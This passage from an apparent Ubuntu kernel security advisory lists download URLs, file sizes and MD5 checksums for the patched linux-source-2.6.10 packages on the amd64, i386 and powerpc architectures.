d3aee75b29b7a6380810efbff39014e1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-amd64-xeon_2.6.10-34.4_amd64.deb\r\n Size/MD5: 280016 0fae42f06be47a805e99ad30a9b853d2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5_2.6.10-34.4_amd64.deb\r\n Size/MD5: 6136286 f3789612e6dcdc712b54ae913a388373\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-amd64-generic_2.6.10-34.4_amd64.deb\r\n Size/MD5: 14573534 2cae783edd734f1f2856bd9ebf07de2e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-amd64-k8-smp_2.6.10-34.4_amd64.deb\r\n Size/MD5: 15121222 ea5fceb7f01367bfea3c75cee2ba1ca8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-amd64-k8_2.6.10-34.4_amd64.deb\r\n Size/MD5: 15086566 d577f2ae4be792d392fe39862b763af9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-amd64-xeon_2.6.10-34.4_amd64.deb\r\n Size/MD5: 14960568 8b5044dbe7e197a081176aefa881e20c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-patch-ubuntu-2.6.10_2.6.10-34.4_amd64.deb\r\n Size/MD5: 1350520 992d26c9208eaa58d73431e848300ad7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/loop-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 14226 f9b3f5692bc97b2b6126463beb079bba\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/md-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 178480 ed673c280dbc72f585d9f758250d5b7f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nfs-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 174854 da683587fa305fe60f9fceea108e3fbc\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-extra-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 731046 dec8eb5c577d960c510de5859fddc6e1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-firmware-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 780902 55dac3746af67a93e0216c7663d11080\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 150018 ce51c5a21dcf081b55ff133c7551fe7e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-pcmcia-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 168132 fe6470ed4149c966ad0b02f5837bb53f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-shared-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 9560 45138e7132c22d07250a4d08f965241c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-usb-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 94858 9c6b98daee160ee106415cc71d631877\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ntfs-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 45728 ff3f87447c5b4cdf7ff6f92c958cf25f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/parport-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 33162 a7b48c602f2beffc6540c4ebc192b917\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/pcmcia-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 55286 5924910f721ae41bcd8e5fee3faf3a92\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/pcmcia-storage-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 4662 4ea53b1b6d8ddc11406353a2929f1ac5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/plip-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 7840 cb3fe4f61299ed2624e920b0d5a5ad18\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ppp-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 53804 a69417f7f8c48ad5871cd4b8ca2f2e70\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/reiserfs-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 111112 6d327d30d7b7adb3197adc0bd39a67be\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/rtc-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 10164 c898bdf01a889bcf62211f8fba618a87\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/sata-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 60460 f38cbf0cda98d6df39b7a29a6553dad8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-common-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 208568 297295a2a62b5925c18da8c79f8fd217\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-core-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 69254 fd6d705e6a6381b63e39f8ec087c4af4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-extra-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 394750 2d6e4b96116becfbc127e801c8bfb5f4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 294482 c5877bc5d5ce6a16a945fcfdd03663b3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/serial-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 12078 4b19866599d12de319dcd9363470115f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/socket-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 22658 4712b3ca6d5b7a0ace1f9b5148b842b0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.10/ufs-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 28796 06b5d6185f35669e38971306f10992ba\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/usb-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 56782 1660dab0f77a74a859cfa63a71042375\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/usb-storage-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 34936 06fd69670c6aab6f422878860490e8db\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/xfs-modules-2.6.10-5-amd64-generic-di_2.6.10-34.4_amd64.udeb\r\n Size/MD5: 247456 73714c2c823c2cd541cebc015ab744e2\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/acpi-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 18156 c8b2f02968c7eee342a49b5251b71a8a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/cdrom-core-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 44824 d89baaedf6345e30e39b3cf796d175d1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/cdrom-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 103034 bebdea2e76c271c429e885fc5ecdc77f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ext3-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 86000 f96e58f5f41fecec7deed5e24df0b714\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fat-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 29090 76b983db144df6d9ee771fdce7029ca6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fb-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 39770 d1b068bb72fcf316156878c7970ab373\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/firewire-core-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 71146 ddae881a5548dfc43778a72de0c64f26\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/firmware-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 5500 34d41df49453a7d36f16fb1dd24db6e4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/floppy-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 31580 850469c10a719fef4d80bf9162b845ba\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ide-core-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 52938 4d6071502a847a572fa66d99920fec88\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ide-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 104448 7832f619154558c2cab1d03eb896b125\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/input-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 38622 df81ddcb826807946f82069b1e1a6a43\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ipv6-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 114568 4bc16f98c3fa2053954a2bb3f7acc4d2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/irda-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 190646 eb1382c61174e9bae6bfdc6e6e401e98\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/jfs-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 86538 53a7321e67d1ef5886bc97345ea65f3e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/kernel-image-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 1389502 8306eb54c3640159b9f08ff6e6b2f29b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-386_2.6.10-34.4_i386.deb\r\n Size/MD5: 313384 f66fd0977b03e7dd7f0214c62f47b91a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-686-smp_2.6.10-34.4_i386.deb\r\n Size/MD5: 308948 8dd9e78a1943e479aa0dae0e26526f4c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-686_2.6.10-34.4_i386.deb\r\n Size/MD5: 311196 b9940d417b4dd26a97db35d93e221c93\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-k7-smp_2.6.10-34.4_i386.deb\r\n Size/MD5: 309152 6ceaa7d2a2608427503cdae992c1a0b4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5-k7_2.6.10-34.4_i386.deb\r\n Size/MD5: 311306 5f48f618c6375c4c5e9a62cc558ef9f3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-headers-2.6.10-5_2.6.10-34.4_i386.deb\r\n Size/MD5: 6133154 bfb429c7674a9aed5cf4f50801043acf\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-386_2.6.10-34.4_i386.deb\r\n Size/MD5: 15611142 f798f9c9d08bdf0ad17d98a5d32419f7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-686-smp_2.6.10-34.4_i386.deb\r\n Size/MD5: 16187540 c9ef6d027e3ccb35602e217ccfacf4a8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-686_2.6.10-34.4_i386.deb\r\n Size/MD5: 16606154 357b76381f4582f084c66886ccdd5b45\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-k7-smp_2.6.10-34.4_i386.deb\r\n Size/MD5: 16294386 4d9d2ee80fcbdab06aa498282ea8dc54\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-image-2.6.10-5-k7_2.6.10-34.4_i386.deb\r\n Size/MD5: 16671724 08f654e995fefcd22ac8b5796e4b8b37\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/linux-patch-ubuntu-2.6.10_2.6.10-34.4_i386.deb\r\n Size/MD5: 1345436 c0950b5b624e314ee6d4c25a4c86ee57\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/loop-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 14074 1bac2a7dd02bb7b9d295c68b83d70aa6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/md-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 183160 600f0c2daa02218e1ce41b24e2d3eb76\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nfs-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 172738 8d3551377c4db082ebdd7f662652646c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-extra-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 967776 fb33397fc93defb6caea6da53b15caee\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-firmware-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 780704 dab5953d0c85d39ffdbfc8c2d8ab294b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 140652 dd03b224f23e7ac4a9d159af609224d5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-pcmcia-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 167958 2ca7c46af16597a0daf41f64b10d9db8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-shared-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 9340 c35aece8d1b9990ca05692ba780cdf16\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/nic-usb-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 89324 57e508e34fa99d19104780918cab302e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ntfs-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 48130 eb4ea28a87fc027482246d97b5626899\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/parport-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 30882 9454b412769a75d8c824561eadf62db6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/pcmcia-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 65890 ff683c39e4b989c1315a8c203633e9ec\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/pcmcia-storage-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 4500 cf6d5176a96775a82371eb883063183d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/plip-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 7750 0f3edff0714149fa18539f54407ee5df\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ppp-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 50772 5002eb27a78dd0164f50d8153e3b3e5d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/reiserfs-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 111586 249e36cf94a9f4da0deddf662f1ff0c0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/rtc-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 9890 7658d131f0f492bd48bff35e64f4ced8\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/sata-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 57146 e7e56adfede67694e7b76d51d5e04edb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-common-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 241930 a1ae0a86b71761e1776d5dd76b55c21a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-core-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 66226 6adddaf96a50183939a4a0e22b3a4ff2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-extra-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 436516 8b63963c51b1ec04420d068ebebbea94\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/scsi-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 485666 9ce812efd370a2e8d248ab43984880fd\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/serial-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 11470 5e43542b223c13898d77ba4a8e273193\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/socket-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 21240 3005e76d6d59a7630d82baedd092af89\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.10/ufs-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 29524 e3a0cdc7879b18ae0631e0ca14e8eb9d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/usb-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 106140 7f220883426d1b17cdeed44ea1d2174b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/usb-storage-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 33818 a98c73148bfe00e48314222e2d0139ed\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/xfs-modules-2.6.10-5-386-di_2.6.10-34.4_i386.udeb\r\n Size/MD5: 261336 62ef9590de3e912383969f2197b6cc00\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/affs-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 24052 abc25938a2b1e6d1de8c258fd3b2ff09\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/affs-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 24050 a6e734975aadd9eac25f2188cd537d1e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/affs-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 24036 04752ff30bea278fd74a30332c027088\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/cdrom-core-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 58274 e185737861b39d526be448f5075a44d2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/cdrom-core-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 58278 7de5e5723f3f4925a2952288836670e5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/cdrom-core-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 58264 5d1ac6ea1c2813b6a9b286617cdc8dbd\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ext2-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 30286 46dd898ac6263ec0bc37246992df0d6f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ext2-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 30284 dc63a525784387fe2a8b11709382a83b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ext2-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 30262 601200b0d70b58f217adf2d75c586a59\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ext3-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 109256 5b7ac7750db740a1871b209fa8dec2d7\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ext3-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 109254 1620597776fdaa117c1f60c852ef184a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/ext3-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 109226 c8604627c649578cee5c1477b0a4a03c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fat-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 35384 1552df305c8b64db2654190188b8a93f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fat-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 35380 ba6bb83f878f291f9bdb0e35d15f4673\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fat-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 35380 286ce7234264d10133d13d00bc9ee726\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fb-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 30934 9d0ca7d879a298c13f914df7d6d71cc6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fb-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 30932 fb267c2199cfd65d21a1af13bdc71c6a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fb-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 30914 8af0e49bbf3c04e69fce71ad5a5b7f06\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/firewire-core-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 212962 4c06439a55b889b39e6bd0ab76dec4d1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/firewire-core-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 212950 282471171b183a704d148b6ae4ceb5a3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/firewire-core-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 212930 68b795c8b3015a5ec7cb934a6d48cee5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/firmware-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 6166 d24b91f0c72482aa7988f67c1e9ec899\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/firmware-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 6164 9a7834b0dd749398f777d17893ecd228\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/firmware-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 6156 4ecfd79e504f9e20df37a70266a58570\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/floppy-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 43422 5cbade59079e7fb4ee21d81c01f90815\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/floppy-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 43416 856868a1c1e6c92f5216f5b03d4d0902\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/floppy-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 43422 a7995f72bdd1ce689793a92767605db6\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fs-common-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 4582 c0fe9553c17d6668b545ee025c76366c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fs-common-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 4586 ffdff9ffecf48ba5d084b97ac9343c08\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/fs-common-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 4590 23483028a94dd59b980cd918098bee2b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/hfs-modules-2.6.10-5-power3-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 66004 c7e9c5e2b51c040e93a24bb0e91127f2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/hfs-modules-2.6.10-5-power4-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 65992 2a0482a7c789593e418732cef226df1c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.10/hfs-modules-2.6.10-5-powerpc-di_2.6.10-34.4_powerpc.udeb\r\n Size/MD5: 66002 a9ddbe1988133503ba0749ca79541904\r\n 